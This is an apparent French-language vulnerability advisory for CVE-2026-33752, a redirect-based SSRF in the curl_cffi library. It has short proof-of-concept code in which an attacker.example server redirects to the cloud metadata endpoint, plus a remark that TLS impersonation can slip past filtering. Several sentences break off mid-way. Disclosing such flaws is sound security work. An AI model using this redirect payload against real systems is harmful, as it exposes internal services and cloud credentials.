
Démontre une vulnérabilité SSRF basée sur la redirection dans curl_cffi permettant un accès au réseau interne, avec un code PoC et une analyse du contournement de l'usurpation TLS.
CVE-2026-33752 (SSRF basé sur les redirections menant à un accès au réseau interne dans curl_cffi)
curl_cffi ne restreint pas les requêtes aux plages d'adresses IP internes et suit automatiquement les redirections via la bibliothèque libcurl sous-jacente.
De ce fait, une URL contrôlée par un attaquant peut rediriger des requêtes vers des services internes tels que les points de terminaison de métadonnées cloud. De plus, la fonctionnalité d'usurpation TLS de curl_cffi peut faire apparaître ces requêtes comme un trafic de navigateur légitime, ce qui peut contourner certains contrôles réseau.
Le problème provient de la manière dont curl_cffi gère les requêtes sortantes
Cela signifie que même si une application n'autorise que les requêtes vers des URL externes, un attaquant peut
Par conséquent, les points de terminaison internes (tels que les API de métadonnées d'instance cloud) peuvent être accessibles.
De plus, curl_cffi prend en charge l'usurpation d'empreinte TLS (par exemple, impersonate="chrome"). Dans les environnements où les requêtes sortantes sont filtrées en fonction de l'empreinte TLS, cela peut rendre ces requêtes plus difficiles à détecter ou à bloquer.
Ce comportement est similaire aux problèmes SSRF basés sur les redirections précédemment signalés, tels que CVE-2025-68616, où les redirections permettaient d'accéder à des ressources internes non intentionnelles.
import curl_cffi
resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
print(resp.text)
GET /test
→ 302 Location: http://169.254.169.254/latest/meta-data/
Code de la victime :
import curl_cffi
resp = curl_cffi.get("https://attacker.example/test")
print(resp.text)
Résultat
import curl_cffi\
resp = curl_cffi.get(
"https://attacker.example/test",
impersonate="chrome")
Dans certains environnements, cela peut aider la requête à contourner les contrôles de filtrage basés sur TLS.
Un attaquant qui peut contrôler l'URL demandée peut être en mesure de :